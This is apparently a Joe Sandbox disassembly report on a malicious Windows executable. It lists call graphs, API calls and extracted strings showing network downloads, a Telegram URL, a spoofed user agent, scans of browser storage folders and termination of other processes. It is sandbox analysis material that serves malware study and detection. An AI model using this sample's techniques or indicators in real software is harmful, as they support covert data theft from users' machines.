std::ios_base::_Init 34680->34685 34687 205cb5 41 API calls std::ios_base::_Init 34681->34687 34683 20bc0e _Yarn 34683->34530 34685->34683 34686 20fa93 std::ios_base::_Init 41 API calls 34685->34686 34686->34683 34689 20b08b __EH_prolog3_GS 34688->34689 34690 20b18c 34689->34690 34692 20b0a3 34689->34692 34693 20b0e3 34689->34693 34694 20b0b4 34689->34694 34695 20b11e 34689->34695 34708 20b0a8 34689->34708 34691 20b197 34690->34691 34690->34708 34699 20a85f std::ios_base::_Init 41 API calls 34691->34699 34784 20b8d3 41 API calls 2 library calls 34692->34784 34700 21cc6b std::_Facet_Register 41 API calls 34693->34700 34698 21cc6b std::_Facet_Register 41 API calls 34694->34698 34701 21cc6b std::_Facet_Register 41 API calls 34695->34701 34697 23fc49 5 API calls 34702 20b0b1 34697->34702 34698->34708 34703 20b1a4 34699->34703 34704 20b0f2 34700->34704 34701->34708 34702->34542 34785 20bedb 41 API calls 2 library calls 34703->34785 34706 20a85f std::ios_base::_Init 41 API calls 34704->34706 34706->34708 34707 20b1b8 34709 2202fe Concurrency::cancel_current_task KiUserExceptionDispatcher 34707->34709 34708->34697 34710 20b1c8 34709->34710 34712 20e0e0 __EH_prolog3 _Func_class 34711->34712 34786 210264 34712->34786 34716 20e175 std::ios_base::_Init _Func_class 34716->34544 34718 20c1c7 __EH_prolog3_GS 34717->34718 34719 20c367 34718->34719 34722 20c1da ctype 34718->34722 34866 20f10f 34719->34866 34890 20caf1 41 API calls 3 library calls 34722->34890 34723 20ce70 44 API calls 34724 20c3ac 34723->34724 34726 20a85f std::ios_base::_Init 41 API calls 34724->34726 34776 20c469 34724->34776 34729 20c3c8 34726->34729 34727 20c49f 34735 20be69 std::ios_base::_Init 39 API calls 34727->34735 34758 20c362 34727->34758 34728 20c217 34891 20e5d5 46 API calls 2 library calls 34728->34891 34732 20cba6 46 API calls 34729->34732 34730 20b07f 41 API calls 34733 20c490 34730->34733 34737 20c3e3 34732->34737 34897 20a4fa 41 API calls 34733->34897 34734 20c22c 34739 20ce70 44 API calls 
34734->34739 34735->34758 34736 23fc49 5 API calls 34740 20b5f1 34736->34740 34741 20efdd 41 API calls 34737->34741 34742 20c23c 34739->34742 34783 20c0c7 39 API calls _Func_class 34740->34783 34743 20c407 34741->34743 34744 20c2f7 34742->34744 34746 20a85f std::ios_base::_Init 41 API calls 34742->34746 34745 20cce6 46 API calls 34743->34745 34747 20c321 34744->34747 34748 20c2fd 34744->34748 34750 20c41e 34745->34750 34751 20c255 34746->34751 34749 20c353 34747->34749 34754 20b07f 41 API calls 34747->34754 34752 20b07f 41 API calls 34748->34752 34895 20c9f1 41 API calls _Func_class 34749->34895 34756 20fa63 41 API calls 34750->34756 34757 20cba6 46 API calls 34751->34757 34753 20c31b 34752->34753 34894 20a4fa 41 API calls 34753->34894 34754->34753 34759 20c42d 34756->34759 34760 20c26d 34757->34760 34758->34736 34763 20ac78 std::ios_base::_Init 39 API calls 34759->34763 34761 20efdd 41 API calls 34760->34761 34764 20c291 34761->34764 34765 20c43c 34763->34765 34766 20cce6 46 API calls 34764->34766 34896 205f62 14 API calls 2 library calls 34765->34896 34768 20c2ac 34766->34768 34892 20f0df 41 API calls Concurrency::cancel_current_task 34768->34892 34769 20c44b 34771 20ac78 std::ios_base::_Init 39 API calls 34769->34771 34773 20c45a 34771->34773 34772 20c2be 34775 20ac78 std::ios_base::_Init 39 API calls 34772->34775 34774 20ac78 std::ios_base::_Init 39 API calls 34773->34774 34774->34776 34777 20c2cd 34775->34777 34776->34727 34776->34730 34893 205f62 14 API calls 2 library calls 34777->34893 34779 20c2dc 34780 20ac78 std::ios_base::_Init 39 API calls 34779->34780 34781 20c2eb 34780->34781 34782 20ac78 std::ios_base::_Init 39 API calls 34781->34782 34782->34744 34783->34548 34784->34708 34785->34707 34812 229bf9 34786->34812 34789 20ce70 34790 20ceaa 34789->34790 34791 20ce89 34789->34791 34806 20ceb1 34790->34806 34808 20cee3 34790->34808 34862 20dc05 41 API calls 34790->34862 34859 20dc05 41 API calls 34791->34859 34794 20ce8e 34794->34790 34860 20dc05 41 API 
calls 34794->34860 34796 20ce9c 34796->34806 34861 20dc05 41 API calls 34796->34861 34798 20cf4a 34801 20cfea 34798->34801 34804 20cf53 34798->34804 34799 21ca60 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34800 20d08d 34799->34800 34800->34716 34805 20d01e 34801->34805 34810 20cf69 34801->34810 34802 20dc05 41 API calls 34802->34808 34804->34806 34809 20cfc1 34804->34809 34804->34810 34805->34806 34865 20d235 41 API calls 34805->34865 34806->34799 34808->34798 34808->34802 34808->34806 34864 20d5be 41 API calls 34809->34864 34810->34806 34863 20d270 44 API calls 2 library calls 34810->34863 34817 2313a9 GetLastError 34812->34817 34818 2313c5 34817->34818 34819 2313bf 34817->34819 34823 2313c9 34818->34823 34851 232067 6 API calls __Getctype 34818->34851 34850 232028 6 API calls __Getctype 34819->34850 34822 2313e1 34822->34823 34824 2313e9 34822->34824 34825 23144e SetLastError 34823->34825 34852 2302a1 14 API calls 3 library calls 34824->34852 34828 229c04 34825->34828 34829 23145e 34825->34829 34827 2313f6 34830 23140f 34827->34830 34831 2313fe 34827->34831 34846 232316 34828->34846 34857 22fac6 39 API calls __FrameHandler3::FrameUnwindToState 34829->34857 34854 232067 6 API calls __Getctype 34830->34854 34853 232067 6 API calls __Getctype 34831->34853 34836 23140c 34840 2302fe ___free_lconv_mon 14 API calls 34836->34840 34837 23141b 34838 231436 34837->34838 34839 23141f 34837->34839 34856 2311d7 14 API calls __dosmaperr 34838->34856 34855 232067 6 API calls __Getctype 34839->34855 34843 231433 34840->34843 34843->34825 34844 231441 34845 2302fe ___free_lconv_mon 14 API calls 34844->34845 34845->34843 34847 20e160 34846->34847 34848 232329 34846->34848 34847->34789 34848->34847 34858 238421 39 API calls 4 library calls 34848->34858 34850->34818 34851->34822 34852->34827 34853->34836 34854->34837 34855->34836 34856->34844 34858->34847 34859->34794 34860->34796 34861->34790 34862->34790 34863->34806 34864->34806 34865->34806 34867 20f11e 
__EH_prolog3_GS 34866->34867 34868 20a85f std::ios_base::_Init 41 API calls 34867->34868 34869 20f93d 34868->34869 34870 20cba6 46 API calls 34869->34870 34871 20f955 34870->34871 34872 20efdd 41 API calls 34871->34872 34873 20f973 34872->34873 34874 20cce6 46 API calls 34873->34874 34875 20f988 34874->34875 34876 20fa63 41 API calls 34875->34876 34877 20f996 34876->34877 34878 20ac78 std::ios_base::_Init 39 API calls 34877->34878 34879 20f9a4 34878->34879 34898 205f62 14 API calls 2 library calls 34879->34898 34881 20f9b3 34882 20ac78 std::ios_base::_Init 39 API calls 34881->34882 34883 20f9c2 34882->34883 34884 20ac78 std::ios_base::_Init 39 API calls 34883->34884 34885 20f9ce 34884->34885 34886 20f9e8 34885->34886 34887 20be69 std::ios_base::_Init 39 API calls 34885->34887 34888 23fc49 5 API calls 34886->34888 34887->34886 34889 20c3a2 34888->34889 34889->34723 34890->34728 34891->34734 34892->34772 34893->34779 34894->34749 34895->34758 34896->34769 34897->34727 34898->34881 34900 21787c __EH_prolog3_catch 34899->34900 34901 2178d9 34900->34901 34902 217a6a 34900->34902 34903 217985 _Yarn std::ios_base::_Init 34900->34903 34905 20fa93 std::ios_base::_Init 41 API calls 34901->34905 34914 20b2c0 41 API calls std::ios_base::_Init 34902->34914 34903->34571 34911 217910 _Yarn 34905->34911 34913 2100c0 39 API calls std::ios_base::_Init 34911->34913 34913->34903 34915 20ac27 34916 20ac3c 34915->34916 34917 20ac2f 34915->34917 34918 20be69 std::ios_base::_Init 39 API calls 34917->34918 34918->34916

Control-flow Graph

APIs
• Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
• Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
• InternetOpenUrlA.WININET ref: 0021753F
• InternetReadFile.WININET ref: 00217590
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: Internet$FileH_prolog3_H_prolog3_catch_OpenRead
• String ID: 789593363246702628$8045878863314484420$9351356959942806932$Kernel32.dll$Wininet.dll
• API String ID: 3547353422-2454429382
• Opcode ID: 56ab3980a31ed56c4b3b657d58babb0ac0e0830e3759bf065024349e8bfa1da4
• Instruction ID: bdcf2a143dd4d5731bbda098fcc6345f2fcc9e2a985cd139a837c3fb14109fe5
• Opcode Fuzzy Hash: 56ab3980a31ed56c4b3b657d58babb0ac0e0830e3759bf065024349e8bfa1da4
• Instruction Fuzzy Hash: 58516F74A10268EFDB24DF24CD49BDDBBF9FB09310F0040A9E949A7281D7B45E948FA1

Control-flow Graph
APIs
• __EH_prolog3_GS.LIBCMT ref: 00217BEB
  • Part of subcall function 00217AAA: __EH_prolog3_GS.LIBCMT ref: 00217AB1
  • Part of subcall function 00217AAA: __Xtime_get_ticks.LIBCPMT ref: 00217AC3
  • Part of subcall function 00217AAA: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00217AD0
  • Part of subcall function 002061C0: __EH_prolog3_GS.LIBCMT ref: 002061C7
  • Part of subcall function 002061C0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0020629D
• FindWindowA.USER32(Hello,World), ref: 00217FE8
  • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
  • Part of subcall function 0020A568: __EH_prolog3_GS.LIBCMT ref: 0020A56F
  • Part of subcall function 00215726: __EH_prolog3.LIBCMT ref: 0021572D
  • Part of subcall function 00215040: __EH_prolog3_GS.LIBCMT ref: 0021504A
  • Part of subcall function 00215040: GetNativeSystemInfo.KERNEL32(?,x86,00000000), ref: 00215155
  • Part of subcall function 0021AD7E: __EH_prolog3.LIBCMT ref: 0021AD85
• ExitProcess.KERNEL32 ref: 00218407
  • Part of subcall function 00209FC4: __EH_prolog3.LIBCMT ref: 00209FCB
  • Part of subcall function 00209A90: __EH_prolog3_GS.LIBCMT ref: 00209A9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$H_prolog3$ExitFindInfoInternetNativeOpenProcessSystemUnothrow_t@std@@@WindowXtime_get_ticks__ehfuncinfo$??2@
• String ID: .$/ujs/$1735725670$Hello$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603$World$brCH$brGk$exG$fnc$https://$https://t.me/asdfghjrrewqqqqtfg$ostr$str
• API String ID: 1170277527-2895834990
• Opcode ID: 70df240588e871c9945fb55ec82d55d1cfb1b5e32ca7a01ce4e4efbda96df53e
• Instruction ID: 4bfb61e71c6cdab5af2725675c3c39da962b49271db7262ea588149b63ef8a36
• Opcode Fuzzy Hash: 70df240588e871c9945fb55ec82d55d1cfb1b5e32ca7a01ce4e4efbda96df53e
• Instruction Fuzzy Hash: 22328E31D21398AADB15EBA8C996BDDBBB86F25300F5440D9E405631C3DB741F68CF62

Control-flow Graph

APIs
• __EH_prolog3_GS.LIBCMT ref: 002061C7
  • Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
  • Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0020629D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$H_prolog3_catch_InternetOpen
• String ID: 13697246453241158521$2226158375018974002$3933506600908304605$789593363246702628$Kernel32.dll$Wininet.dll
• API String ID: 1967328160-2221855235
• Opcode ID: c54c5dcdf34229d6b1c5b812e5e370d8b50a7f1b50f301c6d61dfdc98e839add
• Instruction ID: 0f14e6a3a3ece7d2cc2fbe16d555caf7e0c78b63cc80c5beda398131247f61ff
• Opcode Fuzzy Hash: c54c5dcdf34229d6b1c5b812e5e370d8b50a7f1b50f301c6d61dfdc98e839add
• Instruction Fuzzy Hash: AC219170E61388FFCB40FFBC8A4669D7EE5AF56300F544099F404A7282C6B40E648BE2

Control-flow Graph

APIs
• __EH_prolog3_GS.LIBCMT ref: 0020C1C2
  • Part of subcall function 0020C4D0: __EH_prolog3.LIBCMT ref: 0020C4D7
  • Part of subcall function 0020CAF1: __EH_prolog3.LIBCMT ref: 0020CAF8
  • Part of subcall function 0020CAF1: _Func_class.LIBCONCRT ref: 0020CB97
  • Part of subcall function 0020E5D5: __EH_prolog3_GS.LIBCMT ref: 0020E5DF
  • Part of subcall function 0020CBA6: __EH_prolog3.LIBCMT ref: 0020CBAD
  • Part of subcall function 0020EFDD: __EH_prolog3_GS.LIBCMT ref: 0020EFE7
  • Part of subcall function 0020CCE6: __EH_prolog3_GS.LIBCMT ref: 0020CCED
  • Part of subcall function 00205F62: ___std_exception_destroy.LIBVCRUNTIME ref: 00205FA5
  • Part of subcall function 0020B07F: __EH_prolog3_GS.LIBCMT ref: 0020B086
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$H_prolog3$Func_class___std_exception_destroy
• String ID: value
• API String ID: 367360030-494360628
• Opcode ID: fd1578445fb30e1f79a9bf21708f57eeed489eeef3ae80840d112bc89acbefa5
• Instruction ID: b684c2133d69093c53255f6b23b5399ef420bc9aab40ab0f6967d6d6523a22ef
• Opcode Fuzzy Hash: fd1578445fb30e1f79a9bf21708f57eeed489eeef3ae80840d112bc89acbefa5
• Instruction Fuzzy Hash: 4791ABB0911348DEDB14EB64C945BEEBBB4AF15300F5441E9E149A72C3EB701B58CF62

Control-flow Graph

APIs
• __EH_prolog3.LIBCMT ref: 0020B562
  • Part of subcall function 0020B07F: __EH_prolog3_GS.LIBCMT ref: 0020B086
  • Part of subcall function 0020C4D0: __EH_prolog3.LIBCMT ref: 0020C4D7
  • Part of subcall function 0020E0D4: __EH_prolog3.LIBCMT ref: 0020E0DB
  • Part of subcall function 0020E0D4: _Func_class.LIBCONCRT ref: 0020E12D
  • Part of subcall function 0020E0D4: _Func_class.LIBCONCRT ref: 0020E17F
  • Part of subcall function 0020E0D4: _Func_class.LIBCONCRT ref: 0020E192
  • Part of subcall function 0020C1B8: __EH_prolog3_GS.LIBCMT ref: 0020C1C2
  • Part of subcall function 0020C0C7: _Func_class.LIBCONCRT ref: 0020C10A
• _Func_class.LIBCONCRT ref: 0020B607
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: Func_class$H_prolog3$H_prolog3_
• String ID:
• API String ID: 3328072954-0
• Opcode ID: afa8c564a665f066ea7d2d0cfb78c5ba5fee247a00a1ba8b3c3234793c9637d4
• Instruction ID: 0bfc70413a2157ec8d2bf9c1355bbac5ace8558930db9878a5e2ffe2f48cdfc5
• Opcode Fuzzy Hash: afa8c564a665f066ea7d2d0cfb78c5ba5fee247a00a1ba8b3c3234793c9637d4
• Instruction Fuzzy Hash: 87214970C16289EADF05EBA8C9116DDBFB0AF15304F548099E84877392C6755B44CFA2

Control-flow Graph (rendered graph image not reproduced; basic blocks 2302fe-230337, calling RtlFreeHeap and GetLastError)
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00237B16,?,00000000,?,?,00237DB7,?,00000007,?,?,0023836C,?,?), ref: 00230314
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00237B16,?,00000000,?,?,00237DB7,?,00000007,?,?,0023836C,?,?), ref: 0023031F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                            • Opcode ID: c0806a505f27b12cbcaacfab546444003b1c1adfb903e7d25b8228b6ef92ed3a
                                                                                                                                                                                            • Instruction ID: 61b76dff7fcaf842f716cfe2aeabdcb22b3d3ba1e3d561995c819d02b9aea74c
                                                                                                                                                                                            • Opcode Fuzzy Hash: c0806a505f27b12cbcaacfab546444003b1c1adfb903e7d25b8228b6ef92ed3a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 85E08C72950214ABDB312FA0BC5DB9A3BA8BB41791F1540A4F60886160DB708C60CBE4

Control-flow Graph (rendered graph image not reproduced; basic blocks 217870-217a86)
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3886170330-0
                                                                                                                                                                                            • Opcode ID: b036f6746d0e1c82626c4f114b3df0fa5c1c19bc7d6e800a26c49e281cee36b2
                                                                                                                                                                                            • Instruction ID: 18bbf90c960dbe99801b253601e74b949c8f23723a655d1cd7950913fb7dc368
                                                                                                                                                                                            • Opcode Fuzzy Hash: b036f6746d0e1c82626c4f114b3df0fa5c1c19bc7d6e800a26c49e281cee36b2
                                                                                                                                                                                            • Instruction Fuzzy Hash: A6513A71E10219AFCF14DFA8D9859EEBBB5BF88310F104229E914B3351D6319AA0CFA0

Control-flow Graph (rendered graph image not reproduced; basic blocks 2202fe-220367, calling KiUserExceptionDispatcher)
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00205BD8,?,?,?,?,00205BD8,?,00257E08), ref: 0022035E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 6842923-0
                                                                                                                                                                                            • Opcode ID: cd118faf9d22352e6473317f993e11ee67bc7782754baf20cef1f29cc872c9ce
                                                                                                                                                                                            • Instruction ID: 3ea83babc91a43f18904e47db158dc935906bf39365502847f34b1fad2180b51
                                                                                                                                                                                            • Opcode Fuzzy Hash: cd118faf9d22352e6473317f993e11ee67bc7782754baf20cef1f29cc872c9ce
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F01A276900219AFCB01DF9CE884B9EBBB9FF45700F154099E919AB392D770ED01CB90

Control-flow Graph (rendered graph image not reproduced; basic blocks 23188c-2318d9, calling RtlAllocateHeap)
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,002014D8,00000000,?), ref: 002318BE
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: 00f446159827607dcc1aa0fad53667bc592d4143894aac9c06aa2531f2961f1e
                                                                                                                                                                                            • Instruction ID: 2207bad51cea38cb51fbf3fde272c0dae2f3a1bb5907ea6f75f0c10c62c8e43b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 00f446159827607dcc1aa0fad53667bc592d4143894aac9c06aa2531f2961f1e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 71E0E561536222A7FB212A65AC05B9A7788AF023A1F110120AD05961D0DBA4CC3045ED
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00207A8C
                                                                                                                                                                                              • Part of subcall function 0020B4BA: __EH_prolog3.LIBCMT ref: 0020B4C1
                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0000035C,00208101,?,\storage\default\,?), ref: 00207AE0
                                                                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000,?), ref: 00207B91
                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00207C9B
                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,?,?,?), ref: 00207D09
                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?), ref: 00207D14
                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 00207D46
                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00207D5C
                                                                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,?,?), ref: 00207D68
                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00207DB7
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Find$CloseFile$FirstNext$H_prolog3H_prolog3_MatchPathSpec
                                                                                                                                                                                            • String ID: \idb\
                                                                                                                                                                                            • API String ID: 757186195-120003160
                                                                                                                                                                                            • Opcode ID: ab6fc9e8942fd13406a6fa3455190a90548b267bb306a9b278d6cc575b1aac18
                                                                                                                                                                                            • Instruction ID: 0662d83d86bb3e1202480f21113ca8dc821287ed27015d094ddfb2758d56373b
                                                                                                                                                                                            • Opcode Fuzzy Hash: ab6fc9e8942fd13406a6fa3455190a90548b267bb306a9b278d6cc575b1aac18
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BA1543082035ACBDB25EFA0C998BEDBBB4AF15304F5441A9E419A31D2DB706E99CF51
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0021AFF2
                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000268,00209C15,?,?,0024F604), ref: 0021B004
                                                                                                                                                                                            • Process32FirstW.KERNEL32 ref: 0021B022
                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 0021B0BE
                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0021B0CD
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0021B0D4
                                                                                                                                                                                            • Process32NextW.KERNEL32(?,0000022C), ref: 0021B0E7
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0021B101
                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0021B10C
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstH_prolog3_NextOpenSleepSnapshotTerminateToolhelp32
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 271363041-0
                                                                                                                                                                                            • Opcode ID: 8200f704f4b117c7a14a8dd6b7e763c6075fa4f129d2980b3cb9b8b9042177fa
                                                                                                                                                                                            • Instruction ID: cbb0a37f8dc10ae0e5e602cc21bb92e5db3a0446d2b1594f260ff63e722a3bda
